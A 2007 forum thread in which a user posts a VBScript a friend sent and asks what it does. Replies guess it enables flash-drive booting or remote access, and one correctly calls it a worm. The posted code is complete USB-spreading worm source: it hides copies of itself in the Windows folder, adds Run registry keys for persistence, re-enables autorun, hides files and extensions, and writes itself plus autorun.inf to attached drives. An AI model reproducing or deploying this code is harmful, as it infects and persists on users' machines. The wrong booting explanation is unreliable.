1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

What is the function of this VB script

Discussion in 'JavaScript and AJAX' started by Peter_APIIT, Apr 15, 2007.

  1. Peter_APIIT

    Peter_APIIT New Member

    Joined:
    Apr 11, 2007
    Messages:
    92
    Likes Received:
    0
    Trophy Points:
    0
    Occupation:
    Student
    Location:
    Malaysia
    Hello every web developer expert, i have a program sent by my friends to me. Its keep on running in hidden mode or backgroud.

    Therefore, i wonder whether this program will affected my pc overall perforamnce.

    Below is the VB script code:
    Code:
    
    'mark
    'slow and silent (sas)1.0
    on error resume next
    dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,cc,hm
    atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe .MS32DLL.dll.vbs"
    set fs = createobject("Scripting.FileSystemObject")
    set mf = fs.getfile(Wscript.ScriptFullname)
    set rg = createobject("WScript.Shell")
    rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout","0"
    rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\.MS32DLL.dll.vbs"
    rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\winboot","wscript.exe "&winpath&"\boot.ini"
    rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",0,"REG_DWORD"
    rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD"
    rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
    rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt","1"
    rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","1"
    dim text,size
    size = mf.size
    set text=mf.openastextstream(1,-2)
    cc = text.readline
    do while not text.atendofstream
    mysource=mysource&text.readline
    mysource=mysource & vbcrlf
    loop
    Set winpath = fs.getspecialfolder(0)
    set tf = fs.getfile(winpath & "\.MS32DLL.dll.vbs")
    tf.attributes = 32
    set tf=fs.createtextfile(winpath & "\.MS32DLL.dll.vbs",2,true)
    tf.write "'ker"&vbcrlf&mysource
    tf.close
    set tf = fs.getfile(winpath & "\.MS32DLL.dll.vbs")
    tf.attributes = 39
    Set winpath = fs.getspecialfolder(0)
    set tf = fs.getfile(winpath & "\boot.ini")
    tf.attributes = 32
    set tf=fs.createtextfile(winpath & "\boot.ini",2,true)
    tf.write "'ker"&vbcrlf&mysource
    tf.close
    set tf = fs.getfile(winpath & "\boot.ini")
    tf.attributes = 39
    if cc = "'mark" then
    rg.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
    end if
    if cc = "'marker" then
    rg.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname
    end if
    do
    for each flashdrive in fs.drives
    hm="'mark"
    If (flashdrive.drivetype=1 or flashdrive.drivetype=2) and flashdrive.path <> "A:" then
    if(flashdrive.drivetype=2) then
    hm = "'marker"
    end if
    set tf=fs.getfile(flashdrive.path &"\.MS32DLL.dll.vbs")
    tf.attributes =32
    set tf=fs.createtextfile(flashdrive.path &"\.MS32DLL.dll.vbs",2,true)
    tf.write hm&vbcrlf&mysource
    tf.close
    set tf=fs.getfile(flashdrive.path &"\.MS32DLL.dll.vbs")
    tf.attributes =39
    set tf =fs.getfile(flashdrive.path &"\autorun.inf")
    tf.attributes = 32
    set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
    tf.write atr
    tf.close
    set tf =fs.getfile(flashdrive.path &"\autorun.inf")
    tf.attributes=39
    end if
    rg.R
    egWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout","0"
    rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\.MS32DLL.dll.vbs"
    rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\winboot","wscript.exe /E:vbs "&winpath&"\boot.ini"
    rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun",0,"REG_DWORD"
    rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",1,"REG_DWORD"
    rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
    rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt","1"
    rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","1"
    next
    if cc <> "'mark" then
    Wscript.sleep 10000
    end if
    loop while cc <> "'mark"
    
    
    
    Any help, opinion, idea, recommendations is greatly aprpeciated by me and others.
     
  2. pradeep

    pradeep Team Leader

    Joined:
    Apr 4, 2005
    Messages:
    1,646
    Likes Received:
    86
    Trophy Points:
    0
    Occupation:
    Programmer
    Location:
    Kolkata, India
    Home Page:
    This script enables booting from a flashdrive, that's my best guess!
     
  3. Peter_APIIT

    Peter_APIIT New Member

    Joined:
    Apr 11, 2007
    Messages:
    92
    Likes Received:
    0
    Trophy Points:
    0
    Occupation:
    Student
    Location:
    Malaysia
    Is it a file uses to remote access others computer and monitor others computer booting ?
    I just guess.
     
  4. shadowskill404

    shadowskill404 New Member

    Joined:
    Jul 7, 2007
    Messages:
    10
    Likes Received:
    0
    Trophy Points:
    0
    Its a worm... I got one too... hehe
     

Share This Page